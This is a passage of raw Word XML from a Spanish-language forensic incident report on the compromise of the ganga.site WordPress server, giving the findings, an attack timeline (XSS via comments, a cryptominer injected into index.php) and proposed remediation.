          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Todas las acciones anteriores pudieran ser que se ha ejecutado un posible ataque de </w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> site scripting(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6BE4F1" w14:textId="0175ED07" w:rsidR="004E71C8" w:rsidRPr="005579DA" w:rsidRDefault="004E71C8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizando </w:t>
      </w:r>
      <w:r w:rsidR="00BB78C7" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de código de la base de datos, se encuentran las siguientes sentencias dentro de index.db, lo que puede suponer una alteración de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D7881" w14:textId="01094856" w:rsidR="004E71C8" w:rsidRPr="005579DA" w:rsidRDefault="004E71C8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo al posible autor de los hechos, se pueden deducir </w:t>
      </w:r>
      <w:r w:rsidR="003B16AF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>una serie de posibles</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuentas de correo electrónico</w:t>
      </w:r>
      <w:r w:rsidR="003B16AF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> asociadas al autor de los hechos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FC85C" w14:textId="7B95197D" w:rsidR="004E71C8" w:rsidRPr="005579DA" w:rsidRDefault="004E71C8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:r w:rsidR="007B212C" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observa</w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que hay dos cuentas con el dominio </w:t>
      </w:r>
      <w:r w:rsidR="009B7401" w:rsidRPr="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mailinator.com</w:t>
      </w:r>
      <w:r w:rsidR="005F4AC5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11435D77" w14:textId="1E42E50A" w:rsidR="000342A5" w:rsidRPr="005579DA" w:rsidRDefault="000342A5" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CONCLUSION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6BADDC" w14:textId="6EFDBBAB" w:rsidR="009712C6" w:rsidRPr="005579DA" w:rsidRDefault="000342A5" w:rsidP="009B7401">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El servidor web ganga.site</w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es creado el 21 de diciembre de 2018, </w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instalado un</w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servidor MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</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2121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y un servidor Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</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2121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dentro de este servidor Apache, </w:t>
      </w:r>
      <w:r w:rsidR="00DC4235">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el cual se ha instalado</w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>versión</w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.9.8. de WordPress</w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, versión de la que desde</w:t>
      </w:r>
      <w:r w:rsidR="009712C6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el 16 de diciembre de 2018 de la existencia de 8</w:t>
      </w:r>
      <w:r w:rsidR="002121D5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilidades publicadas</w:t>
      </w:r>
      <w:r w:rsidR="009712C6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740889C" w14:textId="339C086E" w:rsidR="00B547F1" w:rsidRPr="005579DA" w:rsidRDefault="00B547F1" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El 30 de diciembre de 2018, e</w:t>
      </w:r>
      <w:r w:rsidR="009712C6" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">l atacante, registrado como Anatoly5676 ha </w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explotado una vulnerabilidad que consiste en que</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los contribuyentes p</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ue</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dan modificar nuevos comentarios realizados por usuarios con mayores privilegios, posiblemente provocando XSS.</w:t>
      </w:r>
      <w:r w:rsidR="002447B0" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Para ello</w:t>
      </w:r>
      <w:r w:rsidR="002447B0" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>se ha aprovechado de una instancia de Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.195.165.56 para alojar el script</w:t>
      </w:r>
      <w:r w:rsidR="00A56BF2" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la web mediante un </w:t>
      </w:r>
      <w:r w:rsidR="002447B0" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comentario</w:t>
      </w:r>
      <w:r w:rsidR="00A56BF2" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD06A6F" w14:textId="0EDBC0AA" w:rsidR="002447B0" w:rsidRPr="005579DA" w:rsidRDefault="002447B0" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este ataque al parecer ha debido de ser </w:t>
      </w:r>
      <w:r w:rsidR="008750BB" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fructífero</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ya que se detectan cambios en la base de datos MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.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5579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidR="00AC2DB5" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>31 de diciembre de 2018</w:t>
      </w:r>
      <w:r w:rsidR="001A4CF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001333DE" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Donde se observan los comentarios dentro de la configuración del index.db, permitiendo a cualquier usuario tener acceso a todos los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EAF21" w14:textId="1B008279" w:rsidR="00A27876" w:rsidRPr="005579DA" w:rsidRDefault="00A27876" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El 1 de enero de 2019 se observa una modificación del index.php de la web de ganga.site, donde se inyecta un script que hace que min</w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> criptomonedas</w:t>
      </w:r>
      <w:r w:rsidR="009B7401">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531AA10" w14:textId="47EC93CC" w:rsidR="00371A7E" w:rsidRPr="005579DA" w:rsidRDefault="009B7401" w:rsidP="005F4506">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="002447B0" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l 03 de enero de 2019</w:t>
      </w:r>
      <w:r w:rsidR="00A56BF2" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, el desde la misma IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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A56BF2" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002447B0" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">de Amazon Web </w:t>
      </w:r>
      <w:r w:rsidR="00A91EB8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</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A56BF2" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001333DE" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ha tratado de acceder a través de </w:t>
      </w:r>
      <w:r w:rsidR="00676DAF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">del servidor </w:t>
      </w:r>
      <w:r w:rsidR="00A27876" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</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676DAF" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aprovechando las vulnerabilidades </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>que consiste</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en que cuando se utiliza el servidor HTTP Apache, los autores podían cargar archivos manipulados que eludían las restricciones de tipo MIME previstas, lo que llevaba a XSS, como lo demuestra un archivo .jpg sin datos JPEG</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y, por otro lado en que </w:t>
      </w:r>
      <w:r w:rsidR="00371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>los autores p</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ue</w:t>
      </w:r>
      <w:r w:rsidR="00371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="005F4506">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00371A7E" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n evitar las restricciones previstas en los tipos de publicaciones mediante entradas diseñadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D10C5B" w14:textId="395CA64F" w:rsidR="00BB78C7" w:rsidRPr="005579DA" w:rsidRDefault="00BB78C7" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PROPUESTA DE ACCIONES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7CE5DD" w14:textId="45B266FB" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00371A7E" w:rsidP="000342A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ante todas las acciones </w:t>
      </w:r>
      <w:r w:rsidR="00315041" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anteriormente</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> expuestas</w:t>
      </w:r>
      <w:r w:rsidR="00315041" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, s</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e eleva propuesta</w:t>
      </w:r>
      <w:r w:rsidR="00315041" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la dirección de ganga.site</w:t>
      </w:r>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la generación de un nuevo servidor Web virtual, el cual se realice adecuadamente su securización y reglas de acceso</w:t>
      </w:r>
      <w:r w:rsidR="00315041" w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> según las siguientes pautas que, como mínimo se indican a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD47EC" w14:textId="58C3FCF8" w:rsidR="00315041" w:rsidRPr="005579DA" w:rsidRDefault="00315041">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005579DA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Realizar pruebas del servidor en unos entornos de test tipo sandbox</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
